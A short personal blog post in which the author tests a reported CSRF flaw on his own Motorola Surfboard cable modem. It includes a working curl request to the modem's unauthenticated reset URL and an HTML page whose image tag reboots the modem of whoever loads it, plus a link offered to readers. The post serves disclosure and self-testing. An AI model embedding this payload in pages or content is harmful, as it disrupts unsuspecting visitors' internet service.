Motorola Surfboard Hack  

So I just found the article here:
http://thehackernews.com/2016/04/hack-modem-internet.html

That describes an CSRF attack to reboot, or worse, factory reset your cable modem. I wanted to see if my SB6121 was also vulnerable.

I quickly browsed to:

192.168.100.1

and was greeted with this screen:

2016-04-11_23-54-32.png

So I dug into the configurations page and found this:

a.png

So? I clicked it (REBOOT that is). And within a few short moments my modem rebooted…. Ok yep that worked.

So I put together this test:

curl 'http://192.168.100.1/reset.htm?reset_modem=Restart+Cable+Modem' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Referer: http://192.168.100.1/cmConfigData.htm' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' --compressed

(Actually I used chrome to make the curl of the click)

I ran that, and, within a few short moments my modem rebooted.
Ok neat.

So I put together this:

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Surfboard Test</title>
</head>
<img src="https://192.168.100.1/logo.gif">
<h1>This is a test</h1>
<body>
</html>

And I browsed to it… Yep it worked too.
This will displlay the modem logo if it works:
Here it is if you want to see if it works for you

Hrm.
Ok Might as well try the reboot again.

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Surfboard Test</title>
</head>
<img src="https://192.168.100.1/reset.htm?reset_modem=Restart+Cable+Modem">
<h1>This is a test</h1>
<body>
</html>

And I browsed to it… And my modem reset again.
Of course I made one of this too. Here it is:

If you click this your modem may reboot! #

Seriously #

Here it is if you want to see if it works for you

I’m not going to try the other one….

Great.

 
12
Kudos
 
12
Kudos

Now read this

Just want my Netflix and Chill

Its been a rough evening. I’ve talked to ~7 different “support” folks at Netflix, and 1 Person from Comcast. It all started when I tried to watch some Netflix: @netflix I’m not using a proxy. Sup. had me visit: https://t.co/yfVeONaNgn... Continue →